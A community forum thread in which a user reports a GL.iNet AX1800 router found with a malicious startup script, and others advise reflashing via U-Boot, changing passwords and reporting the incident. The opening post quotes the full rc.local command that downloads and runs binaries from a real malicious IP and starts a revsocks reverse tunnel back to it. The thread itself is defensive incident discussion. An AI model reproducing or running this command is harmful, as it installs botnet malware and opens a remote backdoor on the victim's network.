Virus on device bought from Amazon

jpyahyah · March 6, 2024, 8:08am

Hi everyone,
I have the ax1800 flint fresh installed (version 4.5.0) and checking the logs I saw that the router is trying to connect to an IP see below, 16 engines flagged it in virustotal.
After checking it again I found that the IP is in the rc.local file (startup) which is the following…

cd /tmp; wget http://94.156.68.104/narm7; chmod +x *; /tmp/narm7 glizzy; wget http://94.156.68.104/revsocksarm; mv revsocksarm revsocks; chmod +x *; ./revsocks -connect 94.156.68.104:808 -pass whatthefuckisacdnorpassword -recn 0 -q &

Is it fine? Why the password is that one?
Suggestions?
Thanks!

JUAN PABLO

admon · March 6, 2024, 8:37am

Hi,

where did you buy it?
Seems to be infected with a reverse proxy shell - so I would assume someone tries to harm you.

Do Not Use the Compromised Device!
Disconnect it from your network immediately to prevent further malicious activity or data leakage.

Check your whole network if it’s safe. Change defaults passwords, etc. etc.

Since the device is tampered, you should reflash a fresh copy of the firmware using uboot asap: Debrick via Uboot - GL.iNet Router Docs 4

jpyahyah · March 6, 2024, 8:40am

Amazon, I just flash it with new firmware from the website…
I’ll try to flash it again with new image.
Thanks for the reply

admon · March 6, 2024, 8:41am

You must use Uboot: Debrick via Uboot - GL.iNet Router Docs 4
Flashing normally will not remove persistent threats.

Depending on your country and situation, you should try to file a complaint or even contact local law-enforcement agencies. In that case, you should leave the router as it is, since it is an evidence (And don’t use it anymore)

xize11 · March 6, 2024, 12:40pm

it kinda looks like you got a used device imho if you don’t trust it due to persistence flash the image via u-boot this will re-create all partitions.

edit: ^ also it is really important to use u-boot, because u-boot erase the partitions fully, just a upgrade will still have possibilities to keep persistence through things like /root/, or /etc/sysupgrade.conf

revsocks is a tool like shadowsocks, however and this is why you still need to see it as a threat no mather what.

it can also be done with the intention to man in the middle your traffic / spy on you, maybe tamper downloads by drive by.

it is not a virus, but clearly someone used this router before either with malicious intent or not.

wether it is a persistent threat or not, I think this is too early to know that.

often for many apt actors normal people are not super important unless you are a programmer with repo access (download servers) to infect as most of the people in a really fast time, a isp, a bussiness, or political reasons, or being a investor.

but it doesn’t mean they can make mistakes, or it is just a solo hacker with that intend.

I would advise to check your most critical devices such as Windows, comprehending what you have downloaded at the time presence, did you accept certificates on sites?, maybe reinstall if you don’t trust it, and check the connections to the outside if something is strange.

edit:
also I did some research on this ip.

according urlhaus virustotal its falling under the mirai botnet activity.

so report it and clean it

slesar · March 6, 2024, 1:55pm

Did you read update security? Looks like that your situation. Also, mark flag in amazon for fraud things.
https://dl.gl-inet.com/

RVer · March 6, 2024, 11:40pm

Hmmm… just out of curiosity, I ran a quick search.

The IP address 94.156.68.104 belongs to limenet [dot] io . Limenet rents out server space.

URLhaus (a respected malware tracker project) identifies 94.156.68.104 as “While the URL referenced below has been used by bad actors to spread malware in the past, the malicious content has obviously been removed around 2022-12-20.” BUT, it looks like something is still going on at that IP as an automated review pulled a payload on 2024-02-21 (there has been nothing found since).

So… yeah. UBOOT to install a new image.

GrannySmasher · March 6, 2024, 11:48pm

I would definitely report this to Amazon and police as Amazon are unwittingly taking part in a physical malware delivery system. How many devices did you connect to it? Did you get any ‘connection not secure’ warnings?

jpyahyah · March 7, 2024, 12:14am

Hi Everyone,
I have installed a syslog and dropped all the logs there. You can see that it tried 20 times, then it “give up” and couldn’t do anything. On the other hand, having that code there scared me a bit…
The router was purchased brand new in a seal box from Amazon. I used it since January and then installed couple plug ins to try… may be from them I got the code in the startup…

All PC at home were scanned today and no virus… just in case I did format and change almost all passwords…
Thanks!

GrannySmasher · March 7, 2024, 12:29am

Could you tell me how you went about finding the infection in the first place? As in what do you have to click in order to detect its there. I ask as I also have an AX1800 from Amazon but know nothing about system logs

packetmonkey · March 7, 2024, 1:51am

If this was not updated and was on the internet for a month or longer in a vulnerable state it would not surprise me that it was pulled into a botnet.
Edited: missed an important “not” in the sentence. Apologies

jpyahyah · March 7, 2024, 2:27am

For the past few weeks, my internet has been sluggish. Despite multiple calls to my ISP, they repeatedly advised me to reboot my router, claiming everything was fine. Frustrated, I set up a syslog server to monitor the logs(you can see them in a friendly way). After each reboot, I noticed repeated attempts to connect to a suspicious external IP address. Curious, I investigated further and found malware-related activity in Virustotal or just Google. Upon examining the startup scripts, I discovered additional scripts containing the problematic lines mentioned earlier.

See the image where you can see the place where the script was…

alzhao · March 7, 2024, 3:03am

Can you email us with your Amazon order number: support at glinet.biz

Need to investigate with more details.

jpyahyah · March 7, 2024, 3:38am

Ok at your attention, Alzhao?
BTW I purchased it in November

alzhao · March 7, 2024, 4:14am

Yes please also refer to this thread.

admon · March 7, 2024, 6:04am

I would assume that this is the issue here. Not all plugins might be safe to use. Plugins are always 3rd party and should be handled with care.

It would make me wonder if the virus was already there as the device falls out of the amazon package.

When I wrote my first comments I wasn’t aware that you already used your device for plenty of weeks.

xize11 · March 7, 2024, 6:34am

I won’t be surprised if the device was tampered, often you see this happen with crypto wallets too😉

Otherwise i would assume more people had this, and was it a third party seller?

Interestingly enough mirai scans for telnet, but telnet is not open by default, it can be a fork which leverage other exploits, but my first thought is the seller.

Also when they do that with crypto wallets they can sell them with preinstalled keys even completely sealed.

jpyahyah · March 7, 2024, 6:56am

Yes almost sure it came from the plug-ins that you can download from the router…
Anyway, before wipe it out yesterday I tried again (isolated from the rest of the network) to test some of the plug-ins that I have installed before but all were clean…

jpyahyah · March 7, 2024, 6:58am

Yes, you are right… Maybe next update some Anti-virus/malware would be a good idea!

BTW I installed (before formatting) ClamAV… All good!

2lame · March 7, 2024, 7:27am

I’m interested to hear which plugins you installed, so maybe I can avoid this in future.

I hve installed a few on my routers (6 in total

Thanks!